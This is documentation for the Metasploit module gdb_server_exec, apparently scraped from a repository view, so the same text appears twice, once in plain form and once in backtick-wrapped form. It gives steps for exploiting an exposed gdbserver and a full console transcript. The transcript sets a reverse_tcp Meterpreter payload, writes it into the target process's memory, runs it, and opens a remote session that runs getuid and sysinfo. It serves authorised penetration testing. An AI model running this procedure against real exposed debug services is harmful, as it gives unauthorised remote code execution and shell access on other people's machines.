documentation/modules/exploit/multi/gdb/gdb_server_exec.md

## Vulnerable Application

This module attempts to execute an arbitrary payload on a loose
[gdbserver](https://sourceware.org/gdb/onlinedocs/gdb/Server.html) service.

## Installation Steps

Install gdbserver:

```
apt-get install gdbserver
```

## Verification Steps

Start gdbserver on a TCP port:

```
gdbserver 0.0.0.0:1234 /bin/true
```

1. Start msfconsole
1. Do: `use exploit/multi/gdb/gdb_server_exec`
1. Do: `set RHOSTS <ip>`
1. Do: `set RPORT <port>`
1. Do: `run`
1. You should get a session.

## Options

## Scenarios

### gdbserver 10.2 on Ubuntu 20.04 (x86_64)

```
msf6 > use exploit/multi/gdb/gdb_server_exec
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/gdb/gdb_server_exec) > set rhosts 192.168.200.135
rhosts => 192.168.200.135
msf6 exploit(multi/gdb/gdb_server_exec) > set rport 1234
rport => 1234
msf6 exploit(multi/gdb/gdb_server_exec) > set target x86_64
target => x86_64
msf6 exploit(multi/gdb/gdb_server_exec) > set payload linux/x64/meterpreter/reverse_tcp 
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/gdb/gdb_server_exec) > run

[*] Started reverse TCP handler on 192.168.200.130:4444 
[*] 192.168.200.135:1234 - Performing handshake with gdbserver...
[*] 192.168.200.135:1234 - Stepping program to find PC...
[*] 192.168.200.135:1234 - Writing payload at 00007ffff7fd0103...
[*] 192.168.200.135:1234 - Executing the payload...
[*] Sending stage (3020772 bytes) to 192.168.200.135
[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.135:33198 ) at 2022-04-16 16:21:14 -0400

meterpreter > getuid
Server username: user
meterpreter > sysinfo
Computer     : 192.168.200.135
OS           : Ubuntu 20.04 (Linux 5.13.0-35-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```
gdb_server_exec: Cleanup and add support for armle/aarch64 architectures 2022-04-25 19:25:06 +00:00			`## Vulnerable Application`

			`This module attempts to execute an arbitrary payload on a loose`
			`[gdbserver](https://sourceware.org/gdb/onlinedocs/gdb/Server.html) service.`

			`## Installation Steps`

			`Install gdbserver:`

			```
			`apt-get install gdbserver`
			```

			`## Verification Steps`

			`Start gdbserver on a TCP port:`

			```
			`gdbserver 0.0.0.0:1234 /bin/true`
			```

			`1. Start msfconsole`
			1. Do: `use exploit/multi/gdb/gdb_server_exec`
			1. Do: `set RHOSTS <ip>`
			1. Do: `set RPORT <port>`
			1. Do: `run`
			`1. You should get a session.`

			`## Options`

			`## Scenarios`

			`### gdbserver 10.2 on Ubuntu 20.04 (x86_64)`

			```
			`msf6 > use exploit/multi/gdb/gdb_server_exec`
			`[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp`
			`msf6 exploit(multi/gdb/gdb_server_exec) > set rhosts 192.168.200.135`
			`rhosts => 192.168.200.135`
			`msf6 exploit(multi/gdb/gdb_server_exec) > set rport 1234`
			`rport => 1234`
			`msf6 exploit(multi/gdb/gdb_server_exec) > set target x86_64`
			`target => x86_64`
			`msf6 exploit(multi/gdb/gdb_server_exec) > set payload linux/x64/meterpreter/reverse_tcp`
			`payload => linux/x64/meterpreter/reverse_tcp`
			`msf6 exploit(multi/gdb/gdb_server_exec) > run`

			`[*] Started reverse TCP handler on 192.168.200.130:4444`
			`[*] 192.168.200.135:1234 - Performing handshake with gdbserver...`
			`[*] 192.168.200.135:1234 - Stepping program to find PC...`
			`[*] 192.168.200.135:1234 - Writing payload at 00007ffff7fd0103...`
			`[*] 192.168.200.135:1234 - Executing the payload...`
			`[*] Sending stage (3020772 bytes) to 192.168.200.135`
			`[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.135:33198 ) at 2022-04-16 16:21:14 -0400`

			`meterpreter > getuid`
			`Server username: user`
			`meterpreter > sysinfo`
			`Computer : 192.168.200.135`
			`OS : Ubuntu 20.04 (Linux 5.13.0-35-generic)`
			`Architecture : x64`
			`BuildTuple : x86_64-linux-musl`
			`Meterpreter : x64/linux`
			`meterpreter >`
			```